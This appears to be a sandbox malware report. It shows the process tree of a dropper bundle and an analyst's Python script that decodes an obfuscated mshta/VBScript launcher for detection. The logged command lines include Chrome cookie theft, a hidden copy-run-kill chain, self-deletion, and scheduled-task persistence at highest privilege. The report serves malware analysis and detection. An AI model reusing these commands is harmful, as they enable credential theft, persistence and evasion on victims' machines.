          cmd: C:\Windows\system32\cmd.exe /c Thu079294186b.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe  (PID 1248)
            cmd: Thu079294186b.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe  (PID 4528)
              cmd: C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe
              - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe  (PID 4644)
              cmd: C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu079294186b.exe
              - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2880)
          cmd: C:\Windows\system32\cmd.exe /c Thu0785d39bed3127.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0785d39bed3127.exe  (PID 3388)
            cmd: Thu0785d39bed3127.exe
            - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1760)
          cmd: C:\Windows\system32\cmd.exe /c Thu07591e8932000a1.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07591e8932000a1.exe  (PID 596)
            cmd: Thu07591e8932000a1.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1776)
          cmd: C:\Windows\system32\cmd.exe /c Thu0733ed8a825a025a.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0733ed8a825a025a.exe  (PID 1196)
            cmd: Thu0733ed8a825a025a.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
          [6] C:\Windows\SysWOW64\cmd.exe  (PID 4932)
              cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im Thu0733ed8a825a025a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0733ed8a825a025a.exe" & del C:\ProgramData\*.dll & exit
            [7] C:\Windows\SysWOW64\taskkill.exe  (PID 7128)
                cmd: taskkill /im Thu0733ed8a825a025a.exe /f
                - Kills process with taskkill
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 668)
          cmd: C:\Windows\system32\cmd.exe /c Thu0759a981db.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0759a981db.exe  (PID 1276)
            cmd: Thu0759a981db.exe
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\11111.exe  (PID 4192)
              cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\11111.exe  (PID 4540)
              cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              - Executes dropped EXE
          [6] C:\Windows\system32\WerFault.exe  (PID 3052)
              cmd: C:\Windows\system32\WerFault.exe -u -p 1276 -s 808
              - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1528)
          cmd: C:\Windows\system32\cmd.exe /c Thu0758285c76.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exe  (PID 3020)
            cmd: Thu0758285c76.exe
            - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 368)
          cmd: C:\Windows\system32\cmd.exe /c Thu0730ece8e29065b7.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0730ece8e29065b7.exe  (PID 1392)
            cmd: Thu0730ece8e29065b7.exe
            - Executes dropped EXE
            - Modifies registry class
          [6] C:\Windows\SysWOW64\control.exe  (PID 2616)
              cmd: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",
            [7] C:\Windows\SysWOW64\rundll32.exe  (PID 4168)
                cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",
                - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 676)
          cmd: C:\Windows\system32\cmd.exe /c Thu07f9ae12c2bc.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07f9ae12c2bc.exe  (PID 2308)
            cmd: Thu07f9ae12c2bc.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\cmd.exe  (PID 4508)
              cmd: cmd.exe /c taskkill /f /im chrome.exe
            [7] C:\Windows\SysWOW64\taskkill.exe  (PID 4712)
                cmd: taskkill /f /im chrome.exe
                - Kills process with taskkill
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2396)
          cmd: C:\Windows\system32\cmd.exe /c Thu0784ab7efb72.exe /mixtwo
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exe  (PID 2472)
            cmd: Thu0784ab7efb72.exe /mixtwo
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exe  (PID 2468)
              cmd: Thu0784ab7efb72.exe /mixtwo
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\cmd.exe  (PID 4320)
                cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu0784ab7efb72.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0784ab7efb72.exe" & exit
              [8] C:\Windows\SysWOW64\taskkill.exe  (PID 4704)
                  cmd: taskkill /im "Thu0784ab7efb72.exe" /f
                  - Kills process with taskkill
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1520)
          cmd: C:\Windows\system32\cmd.exe /c Thu0782554cbdd5d.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0782554cbdd5d.exe  (PID 64)
            cmd: Thu0782554cbdd5d.exe
            - Executes dropped EXE
            - Checks computer location settings
          [6] C:\Users\Admin\Pictures\Adobe Films\rE0s2I5YsAkrhL0rwm2cMGMH.exe  (PID 4620)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\rE0s2I5YsAkrhL0rwm2cMGMH.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\Pictures\Adobe Films\JBqUVl0AavziUFk8mF9MBEFz.exe  (PID 5084)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\JBqUVl0AavziUFk8mF9MBEFz.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\prmkXyuwHbYwvV1WJVBf_POw.exe  (PID 4224)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\prmkXyuwHbYwvV1WJVBf_POw.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\4TVjmxhIVxePNNzIix5Vi_4t.exe  (PID 4116)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\4TVjmxhIVxePNNzIix5Vi_4t.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\3ahaQf1S8zP7X6nomLIIp_at.exe  (PID 4104)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\3ahaQf1S8zP7X6nomLIIp_at.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\sFngh8kJcCuAm8jysMbjEirC.exe  (PID 2740)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\sFngh8kJcCuAm8jysMbjEirC.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\ZG2ZCE1830yF8VzewG31eXYv.exe  (PID 3984)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\ZG2ZCE1830yF8VzewG31eXYv.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\1QpswqGMmr8jFRGiU0y1mg0u.exe  (PID 4504)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\1QpswqGMmr8jFRGiU0y1mg0u.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe  (PID 636)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"
            [7] C:\Windows\SysWOW64\mshta.exe  (PID 3404)
                cmd: "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )
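The mshta.exe command line above is a single VBScript expression: WScript.Shell.Run launches a hidden cmd.exe (window style 0, wait true) whose chain copies the dropped executable to a new name with TYPE and a redirect, starts the copy with a switch, and then kills the original by its own file name through a FOR loop so that the parent can be deleted. The mixed case and the always-true If """"=="""" are padding against string matching. The Python below is an added example for this report, not sandbox code: the command line is copied verbatim from the tree, while the VBScript string decoding, the cmd chain splitting and the step labels are mine.

```python
"""Unwrap the mshta.exe / VBScript launcher spawned by FL7GsZQxln4TI_WnMhWcDW6h.exe.

Added example for this report, not part of the sandbox output. The command line is
copied verbatim from the process tree; the parsing and the labels are mine.
"""
import re

REPORT_MSHTA_CMDLINE = r'''"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\FL7GsZQxln4TI_WnMhWcDW6h.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )'''


def vbscript_string_at(src, start):
    """Decode the VBScript string literal opening at src[start] (a quote inside is doubled).
    Returns (text, index just after the closing quote)."""
    out, i = [], start + 1
    while i < len(src):
        if src[i] == '"':
            if src.startswith('""', i):
                out.append('"')
                i += 2
                continue
            return "".join(out), i + 1
        out.append(src[i])
        i += 1
    raise ValueError("unterminated VBScript string")


def extract_run_call(cmdline):
    """Return (command, window_style, wait) from WScript.Shell .Run(command, style, wait)."""
    m = re.search(r"\.run\s*\(\s*", cmdline, re.IGNORECASE)
    if not m or cmdline[m.end():m.end() + 1] != '"':
        raise ValueError('no .Run("...") call found')
    command, after = vbscript_string_at(cmdline, m.end())
    args = re.match(r"\s*,\s*(\d+)\s*,\s*(true|false)", cmdline[after:], re.IGNORECASE)
    return command, (int(args[1]) if args else None), (args[2].lower() == "true" if args else None)


def strip_cmd_prefix(command):
    """Drop a leading 'cmd.exe /q /r' (or /c, /k) so only the payload chain remains."""
    m = re.match(r'\s*"?(?:[a-z]:\\[^"]*?\\)?cmd(?:\.exe)?"?\s+(?:/[a-z]\s+)*', command, re.IGNORECASE)
    return command[m.end():] if m else command


def split_cmd_chain(command):
    """Split on & and && that sit outside double quotes; returns [(segment, connector), ...]."""
    segments, buf, in_quotes, i = [], [], False, 0
    while i < len(command):
        ch = command[i]
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            connector = "&&" if command.startswith("&&", i) else "&"
            segments.append(("".join(buf).strip(), connector))
            buf, i = [], i + len(connector)
            continue
        buf.append(ch)
        i += 1
    segments.append(("".join(buf).strip(), None))
    return segments


def classify(segment):
    low = segment.lower()
    if re.match(r"type\s", low) and ">" in low:
        return "copy-via-type"  # TYPE src > dst duplicates a file without calling copy/xcopy
    if re.match(r"start\s", low):
        return "start"
    return "taskkill" if "taskkill" in low else "other"


def redirect_target(segment):
    m = re.search(r'>\s*("[^"]*"|\S+)', segment)
    return m[1].strip('"') if m else None


def start_target(segment):
    # START ["title"] [/switches] program [args]: the first non-switch token is the program
    m = re.match(r'start\s+(?:"[^"]*"\s+)?(?:/\w+\s+)*("[^"]*"|\S+)', segment, re.IGNORECASE)
    return m[1].strip('"') if m else None


def for_set_basename(segment):
    """What %~nxe expands to: name plus extension of the single item in the FOR set."""
    m = re.search(r'\bin\s*\(\s*"?([^")]+?)"?\s*\)', segment, re.IGNORECASE)
    return m[1].rsplit("\\", 1)[-1] if m else None


def analyse(cmdline):
    command, style, wait = extract_run_call(cmdline)
    steps = [(classify(seg), seg) for seg, _ in split_cmd_chain(strip_cmd_prefix(command))]
    by_kind = dict(steps)
    copied_to = redirect_target(by_kind.get("copy-via-type", ""))
    launched = start_target(by_kind.get("start", ""))
    return {
        "hidden_window": style == 0,  # vbHide: no console window appears
        "wait_for_exit": wait,
        "steps": [kind for kind, _ in steps],
        "copied_to": copied_to,
        "launched": launched,
        "launches_the_copy": bool(copied_to and launched and copied_to.lower() == launched.lower()),
        "kills": for_set_basename(by_kind.get("taskkill", "")),
    }


if __name__ == "__main__":
    for key, value in analyse(REPORT_MSHTA_CMDLINE).items():
        print(f"{key:>18}: {value}")
```

The relocated copy lands in "..", one level above the working directory, which the report does not show, so the new file name is the indicator to carry forward (ZCJQBxDe1bLl.exE) together with the mshta.exe to cmd.exe to taskkill.exe parent chain. A generic rule for this pattern is mshta.exe with a "vbscript:" argument that spawns cmd.exe; legitimate HTA usage takes a file path.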
          [6] C:\Users\Admin\Pictures\Adobe Films\mjhuWe53liGAnmDUfGFVJMRV.exe  (PID 4360)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\mjhuWe53liGAnmDUfGFVJMRV.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\20OlplmYlG0taOb1yrJZjz73.exe  (PID 4012)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\20OlplmYlG0taOb1yrJZjz73.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\lbYvRYMGQ18INDdWkYXV4QdW.exe  (PID 4640)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\lbYvRYMGQ18INDdWkYXV4QdW.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\RrfS1ik_AOuozA8Llq5ZZz_I.exe  (PID 2612)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\RrfS1ik_AOuozA8Llq5ZZz_I.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\EpuZ4h5YgR9ln1Xlr3Z3v9uI.exe  (PID 740)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\EpuZ4h5YgR9ln1Xlr3Z3v9uI.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\IhyB3byfgl4OUqLpgmN5iUNo.exe  (PID 4816)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\IhyB3byfgl4OUqLpgmN5iUNo.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe  (PID 5060)
                cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe  (PID 6908)
                cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          [6] C:\Users\Admin\Pictures\Adobe Films\EL5IT3BnDZzH_GPC3r1t_QJn.exe  (PID 3220)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\EL5IT3BnDZzH_GPC3r1t_QJn.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\vt7qlEx05_QwnSiQArra3aoV.exe  (PID 3728)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\vt7qlEx05_QwnSiQArra3aoV.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\eTTYqGuyYZnEOXHGZEZRQqzn.exe  (PID 3248)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\eTTYqGuyYZnEOXHGZEZRQqzn.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\6E3Tsy_pM65NL4yfoF1chK2w.exe  (PID 2268)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\6E3Tsy_pM65NL4yfoF1chK2w.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\zwSfPZG3jmRtfELIwYptCl0y.exe  (PID 1480)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\zwSfPZG3jmRtfELIwYptCl0y.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\L7faU3l3J6fuIjeMgI2x3Q_n.exe  (PID 1296)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\L7faU3l3J6fuIjeMgI2x3Q_n.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\1KvWy0EqEJ1MwUiG4pW47CXi.exe  (PID 2208)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\1KvWy0EqEJ1MwUiG4pW47CXi.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\UWyT7aYiHvA25MgSRQQK2QKb.exe  (PID 356)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\UWyT7aYiHvA25MgSRQQK2QKb.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\YmGxiEquxv5xodShM0zeXz36.exe  (PID 3548)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\YmGxiEquxv5xodShM0zeXz36.exe"
            [7] C:\Windows\SysWOW64\WerFault.exe  (PID 6020)
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 400
                - Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\US4tNNosJ4eBDUV4kOLvAspF.exe  (PID 580)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\US4tNNosJ4eBDUV4kOLvAspF.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\HgVOPkNaTWs2i5jmAAQX9vXj.exe  (PID 4408)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\HgVOPkNaTWs2i5jmAAQX9vXj.exe"
            [7] C:\Users\Public\Videos\hgfdfds.exe  (PID 6428)
                cmd: "C:\Users\Public\Videos\hgfdfds.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\MsCFYxYPhSOdqzmDSY84r0OY.exe  (PID 5564)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\MsCFYxYPhSOdqzmDSY84r0OY.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\1DGl12ex8jVwHzTGfI9P0q3r.exe  (PID 5548)
              cmd: "C:\Users\Admin\Pictures\Adobe Films\1DGl12ex8jVwHzTGfI9P0q3r.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\7zS548F.tmp\Install.exe  (PID 6872)
                cmd: .\Install.exe
              [8] C:\Users\Admin\AppData\Local\Temp\7zS9C76.tmp\Install.exe  (PID 6628)
                  cmd: .\Install.exe /S /site_id "525403"
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1828)
          cmd: C:\Windows\system32\cmd.exe /c Thu077e2e75cb9448.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exe  (PID 1868)
            cmd: Thu077e2e75cb9448.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exe  (PID 4560)
              cmd: C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu077e2e75cb9448.exe
              - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 1840)
          cmd: C:\Windows\system32\cmd.exe /c Thu07ee83176e465e.exe
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2368)
          cmd: C:\Windows\system32\cmd.exe /c Thu073b8d0217a8b45b.exe
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 352)
          cmd: C:\Windows\system32\cmd.exe /c Thu07d03cbff47c.exe
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 3664)
          cmd: C:\Windows\system32\cmd.exe /c Thu0786f9df93.exe

[1] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0786f9df93.exe  (PID 3960)
    cmd: Thu0786f9df93.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exe  (PID 3548)
    cmd: "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu0758285c76.exe" -u
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu073b8d0217a8b45b.exe  (PID 3124)
    cmd: Thu073b8d0217a8b45b.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\WerFault.exe  (PID not shown)
      cmd: C:\Windows\system32\WerFault.exe -u -p 3124 -s 2028
- Program crash
PID:4416
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07ee83176e465e.exeThu07ee83176e465e.exe1⤵
- Executes dropped EXE
- Modifies registry class
PID:2108 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",2⤵PID:904
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",3⤵PID:3796
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",4⤵PID:3844
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\2qmCD.Cpl",5⤵
- Loads dropped DLL
PID:4272
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\Thu07d03cbff47c.exeThu07d03cbff47c.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1476 -
C:\Users\Admin\Pictures\Adobe Films\k195ieHUpMQS9BkZhyv36wqb.exe"C:\Users\Admin\Pictures\Adobe Films\k195ieHUpMQS9BkZhyv36wqb.exe"2⤵
- Executes dropped EXE
PID:4488
-
-
C:\Users\Admin\Pictures\Adobe Films\CRDSMHIqt6CbyEhVfbmL7kwQ.exe"C:\Users\Admin\Pictures\Adobe Films\CRDSMHIqt6CbyEhVfbmL7kwQ.exe"2⤵
- Executes dropped EXE
PID:4328
-
-
C:\Users\Admin\Pictures\Adobe Films\MTyK4gskUw6YvSYsi0YlrPO4.exe"C:\Users\Admin\Pictures\Adobe Films\MTyK4gskUw6YvSYsi0YlrPO4.exe"2⤵
- Executes dropped EXE
PID:4216
-
-
C:\Users\Admin\Pictures\Adobe Films\MFufgG4RPPu9X3FVrkyUMnoO.exe"C:\Users\Admin\Pictures\Adobe Films\MFufgG4RPPu9X3FVrkyUMnoO.exe"2⤵
- Executes dropped EXE
PID:4248
-
-
C:\Users\Admin\Pictures\Adobe Films\YNibrz7xz5HGgHLpNO730UWR.exe"C:\Users\Admin\Pictures\Adobe Films\YNibrz7xz5HGgHLpNO730UWR.exe"2⤵
- Executes dropped EXE
PID:5032 -
C:\Users\Admin\Documents\vJ_KcsnGDGg3OICQdhAIGSWU.exe"C:\Users\Admin\Documents\vJ_KcsnGDGg3OICQdhAIGSWU.exe"3⤵PID:6604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6964
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oya9N3Li2HXd9xHDwHicTRmV.exe"C:\Users\Admin\Pictures\Adobe Films\oya9N3Li2HXd9xHDwHicTRmV.exe"2⤵
- Executes dropped EXE
PID:5020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 4003⤵
- Drops file in Windows directory
- Program crash
PID:4532
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LMxXWBiVFvBjbrtWzyP_wXTD.exe"C:\Users\Admin\Pictures\Adobe Films\LMxXWBiVFvBjbrtWzyP_wXTD.exe"2⤵
- Executes dropped EXE
PID:4968
-
-
C:\Users\Admin\Pictures\Adobe Films\dWHIFENIefm39iLWFI430wCD.exe"C:\Users\Admin\Pictures\Adobe Films\dWHIFENIefm39iLWFI430wCD.exe"2⤵PID:5180
-
-
C:\Users\Admin\Pictures\Adobe Films\kauSYvOxhs4bucKiwTpG9FEm.exe"C:\Users\Admin\Pictures\Adobe Films\kauSYvOxhs4bucKiwTpG9FEm.exe"2⤵PID:5172
-
-
C:\Users\Admin\Pictures\Adobe Films\HaSt43Tpfu6j40yQLSCnEke5.exe"C:\Users\Admin\Pictures\Adobe Films\HaSt43Tpfu6j40yQLSCnEke5.exe"2⤵PID:5164
-
-
C:\Users\Admin\Pictures\Adobe Films\KlJr9BzBTX4owo4tNDsTxtDt.exe"C:\Users\Admin\Pictures\Adobe Films\KlJr9BzBTX4owo4tNDsTxtDt.exe"2⤵PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\8dbNR2osJif2bJo0DpPafXxD.exe"C:\Users\Admin\Pictures\Adobe Films\8dbNR2osJif2bJo0DpPafXxD.exe"2⤵PID:5148
-
-
C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"2⤵PID:5124
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\G0_O23EE8YK4TLVdhBztTHWc.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )3⤵PID:5104
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xjTItW0ZndwXhquUjJos1KjN.exe"C:\Users\Admin\Pictures\Adobe Films\xjTItW0ZndwXhquUjJos1KjN.exe"2⤵PID:5140
-
-
C:\Users\Admin\Pictures\Adobe Films\CqgvXT2kwyo1wUVatfewrnKw.exe"C:\Users\Admin\Pictures\Adobe Films\CqgvXT2kwyo1wUVatfewrnKw.exe"2⤵PID:5132
-
-
C:\Users\Admin\Pictures\Adobe Films\gUHqUafUt1Xb4X_bn7tOvtLv.exe"C:\Users\Admin\Pictures\Adobe Films\gUHqUafUt1Xb4X_bn7tOvtLv.exe"2⤵PID:2980
-
-
C:\Users\Admin\Pictures\Adobe Films\hIoLrXGl3UzP5XvU6EuQ6P80.exe"C:\Users\Admin\Pictures\Adobe Films\hIoLrXGl3UzP5XvU6EuQ6P80.exe"2⤵PID:4820
-
-
C:\Users\Admin\Pictures\Adobe Films\OT4PI1r7cYKNWsqBfBQQ3OFQ.exe"C:\Users\Admin\Pictures\Adobe Films\OT4PI1r7cYKNWsqBfBQQ3OFQ.exe"2⤵PID:4608
-
-
C:\Users\Admin\Pictures\Adobe Films\ixLUOea2Zum3WxoP4kDApzCd.exe"C:\Users\Admin\Pictures\Adobe Films\ixLUOea2Zum3WxoP4kDApzCd.exe"2⤵PID:2724
-
-
C:\Users\Admin\Pictures\Adobe Films\rILukz326zki3mBkpjYJsI0H.exe"C:\Users\Admin\Pictures\Adobe Films\rILukz326zki3mBkpjYJsI0H.exe"2⤵PID:1240
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵PID:5260
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"2⤵PID:1624
-
C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"C:\Users\Admin\Pictures\Adobe Films\0FHXdSKBElAKEXYuHE4Ca5o6.exe"3⤵PID:5688
-
-
-
